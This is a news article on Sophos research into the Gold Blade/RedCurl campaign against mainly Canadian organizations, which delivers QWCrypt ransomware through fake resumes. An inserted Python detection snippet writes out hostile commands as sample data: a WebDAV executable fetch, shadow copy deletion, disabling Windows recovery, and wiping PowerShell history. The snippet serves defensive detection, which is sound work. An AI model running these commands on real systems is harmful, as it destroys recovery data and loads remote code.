Canadian Targets Dominated by Gold Blade’s QWCrypt Ransomware in Recent Attacks

Canadian Organizations Targeted by Cyber Campaign Linked to STAC6565

A recent cyber campaign targeting Canadian organizations has been attributed to a threat activity cluster known as STAC6565. Cybersecurity firm Sophos has investigated nearly 40 intrusions associated with this threat actor between February 2024 and August 2025. The campaign is believed to have connections with a hacking group called Gold Blade, also known as Earth Kapre, RedCurl, and Red Wolf.

Initially focused on entities in Russia, STAC6565 has expanded its targets to include organizations in Canada, Germany, Norway, Slovenia, Ukraine, the U.K., and the U.S. The group is financially motivated and has a history of using phishing emails for commercial espionage.

Recent attacks by RedCurl, a subgroup of Gold Blade, have involved ransomware attacks using a custom malware strain named QWCrypt. One of the key tools used by the threat actor is RedLoader, which communicates with a command-and-control (C2) server to gather information about the compromised Active Directory (AD) environment.

According to Sophos researcher Morgan Demboski, the focus of the campaign on Canadian organizations is unusual, with nearly 80% of the attacks targeting entities in Canada. Gold Blade has transitioned from cyber espionage to a hybrid operation involving data theft and selective ransomware deployment through QWCrypt.

Aside from Canada, the U.S., Australia, and the U.K. have also been targeted, with sectors such as services, manufacturing, retail, technology, non-governmental organizations, and transportation being the most affected.

Operating Model and Tactics of STAC6565

The group operates under a “hack-for-hire” model, conducting tailored intrusions for clients while also deploying ransomware to monetize the attacks. Despite speculation that it is a Russian-speaking group, there is currently no definitive evidence to support this claim.


Sophos describes RedCurl as a sophisticated operation that continually refines its techniques and conducts discreet extortion attacks. However, there is no indication that the group is state-sponsored or politically motivated. The operational tempo of the group involves periods of inactivity followed by sudden spikes in attacks, indicating strategic toolset refreshment during downtime.

STAC6565 initiates its attacks through spear-phishing emails targeting HR personnel, using malicious documents disguised as resumes or cover letters. The group has leveraged legitimate job search platforms like Indeed, JazzHR, and ADP WorkforceNow to upload weaponized resumes as part of the application process since at least November 2024.

This tactic increases the likelihood that the document is opened and evades email-based detection mechanisms. In one instance, a fake resume on Indeed redirected users to a booby-trapped URL, leading to the deployment of QWCrypt ransomware via a RedLoader chain.

Delivery Methods and Malware Deployment

The attack chain involves a ZIP archive dropped by the fake resume containing a Windows shortcut (LNK) that fetches a renamed version of “ADNotificationManager.exe” from a WebDAV server. This executable sideloads the RedLoader DLL, which connects to an external server to download and execute the second-stage payload responsible for retrieving malicious files.

The attackers use Microsoft’s Program Compatibility Assistant for payload execution, switching from DLL to EXE payloads in April 2025. The payload connects to a C2 server, gathers system details, and transfers encrypted data to the attacker-controlled server. Additional tools such as RPivot and Chisel SOCKS5 are used for C2 communications.

RedCurl employs a customized version of the Terminator tool to kill antivirus processes using a signed Zemana AntiMalware driver. The attacks are tailored to the target environment, with deployment scripts containing victim-specific IDs. Sophos noted that most attacks were detected and mitigated before QWCrypt installation, but some incidents led to successful ransomware deployment.


Impact and Recommendations

The deployment scripts disable recovery mechanisms and execute ransomware on endpoint devices, including hypervisors, across the network. Cleanup scripts are run to delete shadow copies and PowerShell console history files to hinder forensic recovery.
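The following is an added detection example, not code from the Sophos report or from this article: a small rule set that flags, in process-creation telemetry, the behaviours described above (a payload fetched from a WebDAV path via a shortcut launched from Explorer, shadow copy deletion, PowerShell console history wiping, and recovery being disabled). Field names follow the Sysmon process-creation shape (Image, ParentImage, CommandLine), and the sample events, including the host address, are constructed for illustration.

```python
import re

# Each rule is (name, regex on the command line, optional regex on the parent image).
# The command strings matched here are well-known recovery-tampering / delivery idioms,
# chosen to illustrate the behaviours described in the article, not attributed to the report.
RULES = [
    ("webdav_lnk_fetch",                      # binary fetched over WebDAV by an Explorer-launched LNK
     re.compile(r"\\\\[\w.-]+@(?:ssl|\d+)\\|davwwwroot", re.I),
     re.compile(r"\\explorer\.exe$", re.I)),
    ("shadow_copy_deletion",                  # Volume Shadow Copy removal prior to encryption
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
     None),
    ("powershell_history_wipe",               # anti-forensic deletion of the PSReadLine history file
     re.compile(r"(?:remove-item|rm|del|erase)\b.*consolehost_history\.txt", re.I),
     None),
    ("recovery_disabled",                     # Windows recovery environment switched off
     re.compile(r"bcdedit(?:\.exe)?\s.*recoveryenabled\s+no", re.I),
     None),
]

def classify_event(event):
    """Return the names of every rule matched by one process-creation event."""
    cmd, parent = event.get("CommandLine", ""), event.get("ParentImage", "")
    return [name for name, cmd_re, parent_re in RULES
            if cmd_re.search(cmd) and (parent_re is None or parent_re.search(parent))]

def scan(events):
    """Map each triggered rule name to the indexes of the events that triggered it."""
    findings = {}
    for i, ev in enumerate(events):
        for name in classify_event(ev):
            findings.setdefault(name, []).append(i)
    return findings

# Constructed sample telemetry (not real events); 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd.exe /c start "" \\203.0.113.10@80\DavWWWRoot\share\svchost_update.exe'},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -c Remove-Item $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"},
    {"Image": r"C:\Windows\System32\bcdedit.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "bcdedit /set {default} recoveryenabled no"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe report.txt"},    # benign control event
]

if __name__ == "__main__":
    for rule, idx in scan(SAMPLE_EVENTS).items():
        print(f"{rule}: events {idx}")
```

Any single hit is worth an alert on its own; several of them on one host within minutes matches the cleanup-then-encrypt sequence described above and should be escalated.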

Sophos emphasizes that Gold Blade’s maturity in operations, including abuse of recruitment platforms and continual refinement of delivery methods, sets it apart from typical financially motivated threat actors. As ransomware attacks on hypervisors increase, it is recommended to implement security measures such as multi-factor authentication, strong password policies, and network segregation.

The rise in hypervisor-targeted attacks underscores the need for enhanced security practices to mitigate the impact of intrusion by threat actors.
